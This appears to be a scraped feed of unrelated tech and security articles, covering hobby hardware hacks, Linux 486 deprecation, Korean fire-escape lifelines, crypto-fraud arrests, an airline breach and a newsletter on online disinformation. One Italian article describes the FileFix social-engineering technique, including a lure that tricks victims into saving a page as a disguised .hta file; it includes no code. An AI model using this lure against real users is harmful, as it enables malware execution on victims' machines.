How many times do you have to forget your keys before you start hacking on the problem? For [Binh], the answer was 5 in the last month, and his hack was to make a gesture-based door unlocker. Which leads to the amusing image of [Binh] in a hallway throwing gang signs until he is let in.

The system itself is fairly simple in its execution: the existing deadbolt is actuated by a NEMA 17 stepper turning a 3D printed bevel gear. It runs 50 steps to lock or unlock, apparently, then the motor turns off, so it’s power-efficient and won’t burn down [Binh]’s room.

The software is equally simple; mediapipe is an ML library that can already do finger detection and be accessed via Python. Apparently gesture recognition is fairly unreliable, so [Binh] just has it counting the number of fingers flashed right now. In this case, it’s running on a Rasberry Pi 5 with a webcam for image input. The Pi connects via USB serial to an ESP32 that is connected to the stepper driver. [Binh] had another project ready to be taken apart that had the ESP32/stepper combo ready to go so this was the quickest option. As was mounting everything with double-sided tape, but that also plays into a design constraint: it’s not [Binh]’s door.

[Binh] is staying in a Hacker Hotel, and as you might imagine, there’s been more penetration testing on this than you might get elsewhere. It turns out it’s relatively straightforward to brute force (as you might expect, given it is only counting fingers), so [Binh] is planning on implementing some kind of 2FA. Perhaps a secret knock? Of course he could use his phone, but what’s the fun in that?

Whatever the second factor is, hopefully it’s something that cannot be forgotten in the room. If this project tickles your fancy, it’s open source on GitHub, and you can check it out in action and the build process in the video embedded below.

After offering thanks to [Binh] for the tip, the remaining words of this article will be spent requesting that you, the brilliant and learned hackaday audience, provide us with additional tips.

youtube.com/embed/yNJkpo-19DI?…

hackaday.com/2025/07/02/hack-s…

When it comes to text, how small is too small? The experts say a six point font is the minimum for readability, but as [James Bowman] shows us, you can get away with half of that.

The goal is to produce a 40-character display on a 24 mm x 24 mm LCD that has a resolution of 240 x 240 to show a serial terminal (or other data) on the “TermDriver2” USB-to-Serial adapter. With 24 lines, that’s a line per millimeter: very small text. Three points, to be precise, half what the experts say you need. Diving this up into 40 columns gives a character cell of six by nine pixels. Is it enough?

The raw font on the left, the subpixel rendering on the right. For once, it’s better if you don’t click to enlarge.
Not by itself, no. That’s where the hack comes in: sub-pixel rendering. After all, a “white” pixel on an LCD is actually three elements: a red, a green, and a blue subpixel, stacked side-by-each. Drive each of those subpixels independently and 240 pixels now becomes 720. That’s plenty for a 40 column terminal.

The article discusses how, in general terms, they pulled off the subpixel rendering and kept the font as legible as possible. We think it’s a good try, though the colored fringe around the characters can be uncomfortable to look at for some people — and then we can’t forget the physical size of the characters being 1 mm tall.

If this trick were being used on a larger display with a 240-wide resolution, we’d say “yes, very legible, good job!”– but at this size? We hope we can find our reading glasses. Still, it’s a neat trick to have in your back pocket for driving low-resolution LCDs.

It may not surprise you that aside from improving legibility, subpixel rendering is also used for pixel (er, sub-pixel) art.

The full set of glyphs in their subpixel-rendered glory.

hackaday.com/2025/07/02/subpix…

This week Jonathan chats with benny Vasquez about AlmaLinux! Why is AlmaLinux the choice for slightly older hardware? What is the deal with RISC-V? And how does EPEL fit in? Tune in to find out!

• linkedin.com/in/bennyvasquez/
• almalinux.org
• almalinux.org/blog/2025-04-24-…
• almalinux.org/blog/2025-06-26-…

youtube.com/embed/5G-wIcFLrnM?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/07/02/floss-…

Le autorità spagnole hanno arrestato cinque persone sospettate di aver riciclato 540 milioni di dollari tramite investimenti illegali in criptovalute e di aver frodato più di 5.000 persone. L’operazione di polizia, denominata Borrelli, è stata condotta con il supporto e il coordinamento dell’Europol, nonché delle forze dell’ordine di Estonia, Francia e Stati Uniti.

Le truffe sugli investimenti in criptovalute vengono solitamente messe in atto tramite la truffa romantica (conosciuta anche come macellazione del maiale), divenuta popolare negli ultimi anni.

Lo schema prevede che i truffatori utilizzino l’ingegneria sociale e contattino persone (“maiali”) sui social media e sulle app di incontri. Col tempo, i criminali si guadagnano la fiducia delle vittime simulando un’amicizia o un interesse romantico, e a volte persino fingendosi amici nella vita reale delle vittime.

Una volta stabilito il “contatto”, a un certo punto i criminali propongono alla vittima di investire in criptovalute, reindirizzando la vittima a un sito web fasullo. Purtroppo, di solito è impossibile recuperare i fondi e ricevere il reddito dichiarato da tali “investimenti“. Di norma, dopo l'”investimento“, i fondi vengono movimentati attraverso numerosi conti, il che li rende estremamente difficili da tracciare.

L’indagine sulle attività del gruppo fraudolento è iniziata nel 2023. Da allora, gli esperti di reati finanziari di Europol hanno assistito le autorità spagnole coordinando le indagini e fornendo supporto operativo. Il giorno dell’operazione, un esperto di criptovalute è stato persino inviato in Spagna per assistere gli investigatori.

Mentre i metodi utilizzati dai criminali sono ancora oggetto di indagine, la polizia afferma di aver ormai compreso il modus operandi del gruppo, che ha spostato e nascosto i fondi rubati attraverso i suoi canali in Asia.

“Per svolgere le loro attività fraudolente, si ritiene che i leader del gruppo criminale si siano avvalsi di una rete di complici in tutto il mondo che raccoglievano fondi tramite prelievi di contanti, bonifici bancari e trasferimenti di criptovalute”, ha dichiarato Europol. “Gli investigatori sospettano che l’organizzazione criminale abbia creato una rete aziendale e bancaria con sede a Hong Kong che utilizzava gateway di pagamento e conti su vari exchange, creati a nome di persone diverse, per ricevere, conservare e trasferire fondi ottenuti tramite attività criminali”.

La dichiarazione di Europol sottolinea specificamente il ruolo dell’intelligenza artificiale nella diffusione delle frodi sugli investimenti, che stanno diventando sempre più sofisticate.

L'articolo Pig Butchering Scam: Arrestati 5 criminali in Spagna per una frode da 540 milioni di dollari proviene da il blog della sicurezza informatica.

When a fire breaks out in a high-rise building, conventional wisdom is that stairwells are the only way out. Lifts are verboten in such scenarios, while sheer height typically prevents any other viable route of egress from tall modern buildings. If the stairs are impassable, or you can’t reach them, you’re in dire peril.

In South Korea, though, there’s another option for escape. The answer involves strapping on a harness and descending down ropes hanging off the side of the building, just like in an action movie. It might sound terrifying, but these descending lifeline devices have become a common part of fire safety infrastructure across the country.

Going Down

The concept is elegantly simple—tall buildings like apartments and hotels feature compact rope escape devices that can be quickly deployed from windows or balconies. These allow people to control their descent down the exterior of a building in the event that there is no other route of escape. While fleeing a building down a rope is typically the preserve of fictional spies or trained climbers, these carefully engineered systems are designed for use by ordinary people in emergency situations.

youtube.com/embed/tboKzq3lx8M?…

The typical Korean descending lifeline comes as a kit with some simple components. It consists of a rope or cable, a friction-based descent control mechanism, and a harness system that can be donned quickly by sliding under the arms and tightening a strap. Deploying the device is relatively simple. The rope reel is attached to a large deployable hook that is firmly mounted to the building’s wall, using a screw-threaded coupling. The rope is then thrown out the window. At this point, the user merely needs to attach the harness and tighten it prior to leaving the building.
A typical lifeline descent kit, manufactured by Kfire. Credit: Kfire
When exiting the window, the user is instructed to face the wall on the way down, using their hands and/or feet to control the descent. Ultimately, though, the mechanical speed regulator ensures a safe pace of descent. The devices only allow the descent of one person at at time. However, each end of the rope has a harness. Thus, when one user has descended to ground level, the next person can grab the harness at the other end which has ascended to the window, and begin their descent. This can continue for as many people as needed.

Key to these devices is their focus on simplicity. The descent control mechanism uses a geared braking system that automatically limit the speed of descent to 1.5 meters/sec or less, preventing the user from descending too quickly even if they panic and release their grip. The lifelines are also sold in a range of different lengths to suit the heights of individual floors in a building. This is important to ensure that as the user hits the ground, the other end of the rope has carried the other harness back up to the floor for the next user. The longest variants typically sold are 45 meters in length, intended for buildings up to 15 stories tall. Limits of practicality mean that while these lifelines are useful for many buildings, they’re perhaps not applicable to taller skyscrapers where such escape would be more difficult.

The engineering challenge here isn’t just mechanical. Automatic rope descent systems are a well understood technology, as are hooks and brackets rated to carry human weight for climbing or otherwise. The real challenge comes down to human factors—in that these systems need to be something people can figure out how to use under conditions of extreme stress. The devices need to be intuitive enough that someone who has never used one before can figure it out while a fire rages behind them. It’s one thing to learn how to use a rope descent system by watching a video and trying the equipment at a calm training session. It’s another thing entirely to do so while a fire rages in the hotel hallway behind you.

While these lifeline systems are relatively simple, they’re still a lot more complicated to use than something like an airliner life jacket. Requiring an inexperienced end user to thread a fitting on a rope coupler without dropping it out the window in a panic situation is a tall ask. Still, the lifelines provide a useful additional escape option. It may not be the easiest way out of the building, or anybody’s first choice, but when there’s no other option, it’s good to have.

South Korea’s adoption of these systems reflects both the country’s high-rise-heavy urban landscape and a pragmatic approach to disaster preparedness. Many apartment buildings and hotels are now required to have these devices installed. The devices are typically mounted in weatherproof boxes near windows or on balconies, ready for deployment when traditional escape routes are compromised. In some cases, the rugged boxes the lifelines come in can even be used as a step-up to ease egress out of higher windows.

Perhaps most importantly, these systems represent a shift in traditional thinking about fire safety. In most jurisdictions, the idea of asking average people to belay down a building is considered untenable—too dangerous and too complicated. In South Korea, the lifelines are on hand, and put control back in the hands of building occupants. When every second counts and traditional escape routes have failed, having a lifeline system could mean the difference between life and death. It’s a sobering reminder that sometimes the best high-tech solution is one that lets people save themselves.

[Bogdan Micea] uses a laptop cooler, but was a bit annoyed that his cooler would run at the same power no matter how hard the laptop was working. Rather than keep adjusting the cooler’s power manually, he automated it by installing an Arduino Pro Micro as a controller in the cooler and writing a Rust controller application for his computer.

[Bogdan]’s cooler is controlled by four buttons, which can have different functions depending on how long they’re pressed. After mapping out their functionality and minor quirks, [Bogdan] soldered four transistors in parallel with the buttons to let the Arduino simulate button presses; another four Arduino pins accept input from the buttons to monitor their state. The Arduino USB port connects to the cooler’s original USB power input, so the cooler looks superficially unchanged. When the cooler starts up, the Arduino sets it to a known state, then monitors the buttons. Since it can both monitor and control the buttons, it can notify the computer when the cooler’s state changes, or change the state when the computer sends a command.

On the computer’s part, the control software creates a system tray that displays and allows the user to change the cooler’s current activity. The control program can detect the CPU’s temperature and adjust the cooler’s power automatically, and the Arduino can detect the laptop’s suspend state and control power accordingly.

Somewhat surprisingly, this seems to be the first laptop cooler we’ve seen modified. We have seen a laptop cooler used to overclock a Teensy, though, and a laptop’s stock fans modified.

hackaday.com/2025/07/02/making…

È stato scoperto sul sistema operativo Microsoft Windows un nuovo metodo per aggirare la protezione che consente l’esecuzione di script dannosi senza alcun preavviso all’utente. La tecnica, chiamata FileFix, è stata migliorata e ora sfrutta una vulnerabilità nel modo in cui i browser gestiscono le pagine HTML salvate.

L’attacco è stato presentato da un ricercatore di sicurezza noto come mr.d0x. Aveva precedentemente illustrato il funzionamento della prima versione di FileFix. All’epoca, gli aggressori utilizzavano una pagina di phishing per convincere la vittima a incollare un comando PowerShell mascherato nella barra degli indirizzi di Windows Explorer. Una volta incollato, il comando veniva eseguito automaticamente, rendendo l’attacco praticamente invisibile all’utente.

La nuova variante di FileFix è ancora più sofisticata. Permette l’esecuzione dello script dannoso, bypassando la protezione Mark of the Web ( MoTW ), progettata per bloccare l’esecuzione di file potenzialmente pericolosi scaricati da Internet. In questo attacco, l’aggressore utilizza tecniche di ingegneria sociale per convincere la vittima a salvare una pagina HTML utilizzando la scorciatoia da tastiera Ctrl+S e rinominarne l’estensione in .HTA. Tali file sono associati alla tecnologia obsoleta, ma ancora disponibile in Windows, delle applicazioni HTML.

I file con estensione .HTA sono applicazioni basate su HTML che vengono avviate automaticamente tramite il componente di sistema mshta.exe. Questo file eseguibile legittimo consente di eseguire codice HTML e script incorporati con i diritti dell’utente corrente. Questo è ciò che rende i file .HTA uno strumento utile per la distribuzione di codice dannoso.

Come mostrato da mr.d0x, quando si salva una pagina HTML tramite un browser nel formato “Pagina web completa” (con tipo MIME text/html), tale pagina non riceve la speciale etichetta di sicurezza MoTW. MoTW viene solitamente aggiunta automaticamente ai file scaricati da Internet per avvisare l’utente di una potenziale minaccia e bloccare l’esecuzione di script incorporati. L’assenza di questa etichetta offre agli aggressori la possibilità di aggirare i meccanismi di sicurezza standard del sistema.

Una volta che l’utente rinomina il file salvato, ad esempio in “MfaBackupCodes2025.hta”, e lo apre, il codice dannoso incorporato nel file verrà immediatamente eseguito senza alcun avviso o richiesta di sistema. In sostanza, la vittima esegue il malware autonomamente, senza nemmeno rendersene conto.

La parte più difficile per gli aggressori è la fase di ingegneria sociale: convincere l’utente a salvare la pagina e modificarne correttamente l’estensione. Tuttavia, come osserva mr.d0x, questa barriera può essere superata se la pagina falsa è progettata correttamente. Ad esempio, potrebbe apparire come un sito web ufficiale, chiedendo all’utente di salvare i codici di backup per l’autenticazione a due fattori per ripristinare l’accesso all’account in un secondo momento. La pagina potrebbe contenere istruzioni dettagliate, tra cui la richiesta di premere Ctrl+S, selezionare l’opzione di salvataggio “Pagina web, completa” e specificare un nome file con estensione .HTA.

Se una pagina di questo tipo sembra sufficientemente convincente e l’utente non ha conoscenze approfondite in materia di sicurezza e non nota l’estensione del file, la probabilità di un attacco riuscito aumenta significativamente. Ad esempio, gli aggressori potrebbero utilizzare una pagina intitolata “Codici di backup MFA” che suggerisce di salvare un file con il nome “MfaBackupCodes2025.hta”. Questo approccio è particolarmente pericoloso, dato il basso livello di formazione tecnica di molti utenti.

Per proteggersi da tali attacchi, gli esperti raccomandano di eliminare completamente o bloccare il file eseguibile di sistema mshta.exe, che si trova nelle directory C:WindowsSystem32 e C:WindowsSysWOW64. Questo componente non viene praticamente utilizzato nelle attività quotidiane e può essere disabilitato in sicurezza nella maggior parte degli scenari.

L'articolo FileFix aggira la protezione Mark of the Web di Microsoft Windows proviene da il blog della sicurezza informatica.

Some time ago, Linus Torvalds made a throwaway comment that sent ripples through the Linux world. Was it perhaps time to abandon support for the now-ancient Intel 486? Developers had already abandoned the 386 in 2012, and Torvalds openly mused if the time was right to make further cuts for the benefit of modernity.

It would take three long years, but that eventuality finally came to pass. As of version 6.15, the Linux kernel will no longer support chips running the 80486 architecture, along with a gaggle of early “586” chips as well. It’s all down to some housekeeping and precise technical changes that will make the new code inoperable with the machines of the past.

Why Won’t It Work Anymore?

The kernel has had a method to emulate the CMPXCH8B instruction for some time, but it will now be deprecated.
The big change is coming about thanks to a patch submitted by Ingo Molnar, a long time developer on the Linux kernel. The patch slashes support for older pre-Pentium CPUs, including the Intel 486 and a wide swathe of third-party chips that fell in between the 486 and Pentium generations when it came to low-level feature support.

Going forward, Molnar’s patch reconfigures the kernel to require CPUs have hardware support for the Time Stamp Counter (RDTSC) and CMPXCHG8B instructions. These became part of x86 when Intel introduced the very first Pentium processors to the market in the early 1990s. The Time Stamp Counter is relatively easy to understand—a simple 64-bit register that stores the number of cycles executed by the CPU since last reset. As for CMPXCHG8B, it’s used for comparing and exchanging eight bytes of data at a time. Earlier Intel CPUs got by with only the single-byte CMPXCHG instruction. The Linux kernel used to feature a piece of code to emulate CMPXCHG8B in order to ease interoperability with older chips that lacked the feature in hardware.

The changes remove around 15,000 lines of code. Deletions include code to emulate the CMPXCHG8B instruction for older processors that lacked the instruction, various emulated math routines, along with configuration code that configured the kernel properly for older lower-feature CPUs.

Basically, if you try to run Linux kernel 6.15 on a 486 going forward, it’s just not going to work. The kernel will make calls to instructions that the chip has never heard of, and everything will fall over. The same will be true for machines running various non-Pentium “586” chips, like the AMD 5×86 and Cyrix 5×86, as well as the AMD Elan. It’s likely even some later chips, like the Cyrix 6×86, might not work, given their questionable or non-existent support of the CMPXCHG8B instruction.

Why Now?

Molnar’s reasoning for the move was straightforward, as explained in the patch notes:

In the x86 architecture we have various complicated hardware emulation
facilities on x86-32 to support ancient 32-bit CPUs that very very few
people are using with modern kernels. This compatibility glue is sometimes
even causing problems that people spend time to resolve, which time could
be spent on other things.

Indeed, it follows on from earlier comments by Torvalds, who had noted how development was being held back by support for the ancient members of Intel’s x86 architecture. In particular, the Linux creator questioned whether modern kernels were even widely compatible with older 486 CPUs, given that various low-level features of the kernel had already begun to implement the use of instructions like RDTSC that weren’t present on pre-Pentium processors. “Our non-Pentium support is ACTIVELY BUGGY AND BROKEN right now,” Torvalds exclaimed in 2022. “This is not some theoretical issue, but very much a ‘look, ma, this has never been tested, and cannot actually work’ issue, that nobody has ever noticed because nobody really cares.”
Intel kept i486 chips in production for a good 18 years, with the last examples shipped out in September 2007. Credit: Konstantin Lanzet, CC BY-SA 3.0
Basically, the user base for modern kernels on old 486 and early “586” hardware was so small that Torvalds no longer believed anyone was even checking whether up-to-date Linux even worked on those platforms anymore. Thus, any further development effort to quash bugs and keep these platforms supported was unjustified.

It’s worth acknowledging that Intel made its last shipments of i486 chips on September 28, 2007. That’s perhaps more recent than you might think for a chip that was launched in 1989. However, these chips weren’t for mainstream use. Beyond the early 1990s, the 486 was dead for desktop users, with an IBM spokesperson calling the 486 an “ancient chip” and a “dinosaur” in 1996. Intel’s production continued on beyond that point almost solely for the benefit of military, medical, industrial and other embedded users.
Third-party chips like the AMD Elan will no longer be usable, either. Credit: Phiarc, CC-BY-SA 4.0
If there was a large and vocal community calling for ongoing support for these older processors, the kernel development team might have seen things differently. However, in the month or so that the kernel patch has been public, no such furore has erupted. Indeed, there’s nothing stopping these older machines still running Linux—they just won’t be able to run the most up-to-date kernels. That’s not such a big deal.

While there are usually security implications around running outdated operating systems, the simple fact is that few to no important 486 systems should really be connected to the Internet anyway. They lack the performance to even load things like modern websites, and have little spare overhead to run antiviral software or firewalls on top of whatever software is required for their main duties. Operators of such machines won’t be missing much by being stuck on earlier revisions of the kernel.

Ultimately, it’s good to see Linux developers continuing to prune the chaff and improve the kernel for the future. It’s perhaps sad to say goodbye to the 486 and the gaggle of weird almost-Pentiums from other manufacturers, but if we’re honest, few to none were running the most recent Linux kernel anyway. Onwards and upwards!

hackaday.com/2025/07/02/why-th…

Hawaiian Airlines, una delle 10 principali compagnie aeree commerciali degli Stati Uniti, sta indagando su un attacco informatico che ha compromesso alcuni dei suoi sistemi. Gli esperti ritengono che il responsabile della violazione possa essere il gruppo Scattered Spider.

In una dichiarazione ufficiale, la compagnia riferisce che l’incidente informatico non ha compromesso la sicurezza del volo e che tutte le autorità competenti sono già state informate dell’accaduto. Hawaiian Airlines ha inoltre coinvolto esperti esterni di sicurezza informatica nelle indagini, che stanno attualmente contribuendo a valutare l’impatto dell’attacco e a ripristinare i sistemi interessati.

“Hawaiian Airlines sta risolvendo un problema di sicurezza informatica che ha avuto un impatto su diversi dei nostri sistemi IT. La nostra massima priorità è la sicurezza dei nostri clienti e dipendenti. Abbiamo adottato misure per proteggere le operazioni e tutti i voli stanno operando normalmente e in sicurezza”, ha dichiarato la compagnia aerea.

Un banner sul sito web della compagnia aerea afferma che l’incidente non ha avuto alcun impatto sulla sicurezza o sugli orari dei voli. Un messaggio simile è pubblicato sul sito web di Alaska Airlines, di proprietà di Alaska Air Group, la società che ha acquisito Hawaiian Airlines lo scorso anno.

Al momento non è chiaro se i sistemi di Hawaiian Airlines siano stati colpiti da un ransomware che li ha crittografati o se siano stati disattivati ​​per impedire attacchi informatici. Nessun gruppo di hacker ha ancora rivendicato la responsabilità dell’attacco. Vale la pena notare che la compagnia aerea canadese WestJet ha subito un attacco simile all’inizio di questo mese, e l’attacco ha compromesso la disponibilità dell’app e del sito web della compagnia aerea.

Nel frattempo, nel fine settimana, l’FBI , Google Mandiant e Palo Alto Networks hanno diramato un avviso congiunto in merito all’attività del gruppo di hacker Scattered Spider, che ora potrebbe prendere di mira aziende nei settori dell’aviazione e dei trasporti. L’FBI ha osservato che Scattered Spider in genere ricorre all’ingegneria sociale per accedere ai sistemi delle vittime e che gli hacker possono prendere di mira anche fornitori e appaltatori di compagnie aeree di fiducia. Secondo Axios invece, anche l’attacco a WestJet sopra menzionato potrebbe essere opera di Scattered Spider.

L'articolo Hawaiian Airlines sotto attacco hacker, sistemi compromessi proviene da il blog della sicurezza informatica.

KIA ORA. IT'S WEDNESDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and this week's edition comes to you from New Zealand. I'm taking a couple weeks off, so the next newsletter (for paying subscribers) will hit inboxes on July 14.

I'm trying something different this week.

Ahead of the 2024 global megacycle of elections, I had the idea of explaining the links between the digital tactics that have now become all too common in how politicians get elected from Pakistan and Portugal to the United Kingdom and the United States.

Life, however, got in the way. (The best I did was this package around artificial intelligence, disinformation and elections.) So, I'm taking another crack at how we all now live in the Fake News Factory.

Let's get started:

The democratization of online tools and tactics

THE LAST DECADE REPRESENTED the second generation of social media. It was an era where the shine had significantly come off Facebook and Twitter (now X.) It was a time of repeated whistleblower reports about tech giants understanding how their content algorithms were pushing people toward polarizing and extremist content. It was a time of serious commercialization of these platforms by politicians eager to bombard would-be voters with billions of dollars of collective ad buys.

That era is now over. It's not that Facebook and YouTube are no longer important. They are — especially YouTube which has transformed itself into a global rival for traditional television in a way that has upended the advertising industry and fundamentally reshaped how anyone under 30-years old consumes video content. But where the 2015-2025 period was primarily defined by the dominance of a small number of Silicon Valley platforms, we're now in an era where fringe platforms, niche podcasts and the likes of vertical dramas have divided people into small online communities that rarely interact with each other.

This was happening before 2025. But we have reached an inflection point in how the online information ecosystem works. It has now shattered into a million pieces where people gravitate to like-minded individuals in siloed platforms. There is no longer a collective set of facts or events that form the foundation for society. Instead, most of us seek out opinions that already reflect our worldview, often demonizing those who we disagree with in an "othering" that only fuels polarization, misunderstanding and, potentially, offline harm.

And you thought this would be an uplifting newsletter.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in June:
— Debunking popular misconceptions around platform governance; The demise of the open, interoperable internet is upon us; How oversight over AI has drastically slowed since 2023. More here.
— Internal fighting among Big Tech giants has hobbled any pushback against antitrust enforcement; It's time to rethink our approach to tackling foreign interference; Tracking Europe's decade-long push to combat online disinformation. More here.
— Why the G7 has always been a nothing-burger on tech policy; You should keep an eye out on 'digital public infrastructure' in the battle around tech sovereignty; the United Kingdom's expanding online safety investigations. More here.
— The US is sending seriously mixed messages about its approach to tech policy; How the UK became the second place in the world to mandate social media data access; Artificial intelligence will upend how we consume news online. More here.

This bifurcation in how people consume online content has made it next to impossible for foreign interference operations to flourish like they once did. See, there's a positive point. Even two years ago, the Russians could flood the zone with Kremlin talking points and receive a significant bump in online interactions. The Chinese never went in for that sort of thing — though have progressively targeted Western audiences mostly with overt propaganda in support of the Chinese Communist Party.

Now, such efforts are almost certainly doomed to fail. The siloing of social media usage has been married with a need for authenticity — that sense of belonging and insider knowledge that can only come from deep roots in communities that can smell out an imposter from a mile off. That authenticity is something that foreign (covert) campaigns routinely do badly at. State-backed operations don't know the insider lingo; they don't have the long-standing credibility built up over months/years; and they don't have personal ties required to fully embed in the balkanization of social media.

But where state-backed actors remain a threat is in the amplification of existing domestic influencers often by automated bot-nets and other AI-powered tools aimed at juicing social media giants' recommender systems. The companies say they are on top of these covert tactics. But every time there's a massive global political event (or local election), Kremlin-backed narratives keep popping up in people's feeds — often via local influencers whose views just happen to align with Moscow. These individuals are mostly not connected with Russia. But they have likely received a boost from Kremlin-aligned groups seeking to spread those messages to the widest audience possible.

It's about domestic, not foreign

IN TRUTH, STATE-BACKED ACTORS are a very public sideshow to the main event driving ongoing toxicity within the information environment: domestic actors. Be they influencers, scammers, politically-aligned media or, ahem, politicians, they are the key instigator for much of the current. Many of these domestic players see some form of benefit from spreading harm, falsehoods and, in some cases, illegality online. That, it should be added, is then amplified by social media platforms' algorithms that have been programmed to entice people to stay on these networks, often by promoting the most divisive content as possible.

Such a dynamic has been around for years. It isn't a left- or right-wing issue — though repeated studies have shown that conservative social media users promote more falsehoods than their liberal counterparts. It's a basic fact that domestic social media users both know their audience better than foreign influence campaigns and that they have greater credibility with siloed local audiences than Russia, China or Iran.

What has shifted, though, is the ability for almost anyone to run a domestic influence campaign — or, you know, a mainstream political campaign — as if they had the resources of the Kremlin-backed Internet Research Agency. Over the last five years, the toolkit required to skew social media has become readily accessible and significantly cheaper than it once was. That has been spurred on even more through the rapid growth of AI-enabled tools (more on that below.) But everything from a Bangladesh-based bot farm to a Philippines-based dark arts public relations has now become an off-the-shelf product that can be bought via a few clicks on a public-facing website.

This shift has not gone unnoticed by criminals. In 2025, the highest volume of attacks in the (Western) information environment now come from those seeking to dupe social media users out of money — and not to alter their political allegiances. Yes, the impact on politics can have significantly bigger effects. But the rise of "financial disinformation" in terms of frauds and scams promoted on social media has reached pandemic proportions.

Collectively, such digital efforts to swindle people out of money now costs billions of dollars a year, and even that is likely a significant underestimate. It's also directly linked to a crime (aka fraud) when scammers buy social media adverts to convince people to sign up to Ponzi and other get-rich-quick schemes. I did a quick search, via Meta's ad library in six different countries, for such financial scams, and found a prolific amount of advertising that promoted such disinformation. Some of it was blatantly illegal, some of it was not (I'm not linking to it to avoid amplification.) But the fact such scam artists are openly flaunting the law should be a worry for us all.

This democratization of disinformation has only gone from bad to worse with AI tools. Be it cloning technology to spoof a victim's voice, AI-generated images attacking a political opponent or next-generation video software that creates falsehoods from scratch within minutes, the cost for generating toxicity, hate and polarization is now almost zero. Yes, these tools can also generate joy, laughter and entertainment. But the last six months have seen a rapid rise in AI-generated slop that is quickly moving from being easy to detect to being indistinguishable from the real thing.

Trust me, I'm a regulator

THIS YEAR MARKS THE FIRST TIME ON RECORD that several countries' online safety rulebooks are in full operation. Yes, Australia got things started almost five years ago. But with the European Union's Digital Services Act and the UK's Online Safety Act, the Western world has the first signs of what a well-resourced regulatory environment looks like when it comes to keeping people safe online.

Sigh.

It's not that the European Commission and Ofcom (disclaimer: I sit on an independent advisory committee at the British regulator, so anything I say here is done so in a personal capacity) aren't doing their best. They are. It's just both are fighting a 2020 war against perceived threats within the online information environment, and just haven't kept pace with the fast-evolving tactics, some of which I outlined above.

To a degree, the time lag is understandable. Regulators are always going to be behind the curve on the latest threats. Both agencies are still staffing up and learning the ropes of their new rulebooks. How successful either the EU or UK will be in making their online worlds safer for citizens won't be known for at least five years, at the earliest.

But there have been some serious mistakes, especially from the European Commission. Let's leave aside the political nature of the first investigations under the Digital Services Act. And let's leave aside the internal bureaucratic infighting that was always going to arise from such a powerful — and well-resourced — piece of legislation.

For me, the biggest error was how Ursula von der Leyen framed the new rules as almost exclusively a means for combatting Russian interference. That was done primarily to secure her second tenure as European Commission president. But the characterization of the Digital Services Act as an all-powerful mechanism to thwart the Kremlin's covert influence operations has continued well into this year — most notably in the two presidential elections in Romania.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

Let's be clear. These online safety rules are many things. But, at their heart, they are wonky, bureaucratic and cumbersome mandatory requirements for platforms to abide by their own internal policies against illegal content. They are not about Russian disinformation. And they certainly are not about censorship.

Weaponization and unknown unknowns

And that takes me to the final big concern within the Fake News Factory: the weaponization of online safety rules. Since 2016, there have been those within the US that pushed back hard against platforms' efforts to quell illegal and abusive content. That has spiralled into conspiratorial claims that a Censorship Industrial Complex — made up of governments, social media giants and outsiders — is trying to illegally silence predominantly rightwing voices, often via new online safety legislation.

US President Donald Trump's administration has made it clear what it thinks of these rules — and has pushed back hard. It has threatened retaliatory tariffs against countries with online safety rules on the books. It has threatened to ban anyone who allegedly tries to censor Americans from entering the country. It has accused both the UK and EU of infringing on US First Amendment rights.

These attacks against what are, essentially, legal commitments obligating companies to live by their own internal rules — and to demonstrate that they have done so — are now part of the conversation in other Western countries. That includes (mostly) right-wing lawmakers across Europe seeking to weaken these online safety rules, accusing others of censoring conservative viewpoints and mimicking many of the long-standing talking points from their US counterparts.

It's true, particularly during the pandemic, that social media companies made content moderation decisions with imperfect facts. Some posts were unfairly removed or downranked as these firms responded, in real time, to government efforts to amplify scientifically correct information. But the rise of conspiracy theories, which insinuated a mass censoring of online voices, just didn't bear out with the evidence at hand. And that came after repeated reports from the US House of Representatives select subcommittee on the weaponization of the federal government.

If there was evidence of such abuse, then I would be the first to champion such findings. But as we enter the second half of the year, there is one core underlying fact that underpins everything I've written so far: no one has a clue about what happens on these platforms.

Long-time Digital Politics readers will have heard mego on about this for months — and, to be fair, it's part of my day job to look into this issue. But how the complex recommender system algorithms interact with people's individual posts, paid-for advertising and wider efforts to influence people online remains a black box. What I have outlined above, for instance, is based on my own research, what I understand anecdotally about how these platforms work and discussions with policymakers, tech executives and other experts.

The Fake News Factory is my own imagining of how the current online information ecosystem interacts and shapes the world around us. But without better awareness — via mandatory requirements that these firms open up to independent scrutiny, transparency and accountability — about the inner workings of these platforms, that imagining will remain incomplete, at best.

We are entering a new generation of social media with limited awareness, mass balkanization and an increasingly politicization of what should be clear objectives of keeping everyone safe online. How long this era will stick around for is anyone's guess. But, for now, the Fake News Factory remains as strong as ever.

What I'm reading

— The Organization for Economic Cooperation and Development analyzed the so-called age assurance policies from 50 online services — most of which did not have checks in place. More here.

— The team at the DSA Observatory did a deep dive into how individuals, non-profit organizations and consumer groups can bring private enforcement actions under the EU's Digital Services Act.

— The UK's Competition and Markets Authority laid out its rationale for why it had designated Google a so-called "strategic market status" under the country's new digital antitrust rules. More here.

— OpenAI submitted recommendations to the upcoming US AI Action Plan. The words "freedom" and "PRC" are mentioned repeatedly throughout. More here.

— Researchers at USC Annenberg looked at how the media covered the negative side of social media/technology, and found that the companies are rarely blamed. More here.

digitalpolitics.co/newsletter0…

Normally when a government extends a piece of copyright law we expect it to be in the favour of commercial interests with deep pockets and little care for their consumers. But in Denmark they do things differently it seems, which is why they are giving Danes the copyright over their own features such as their faces or voices. Why? To combat deepfakes, meaning that if you deepfake a Dane, they can come after you for big bucks, or indeed kronor. It’s a major win, in privacy terms.

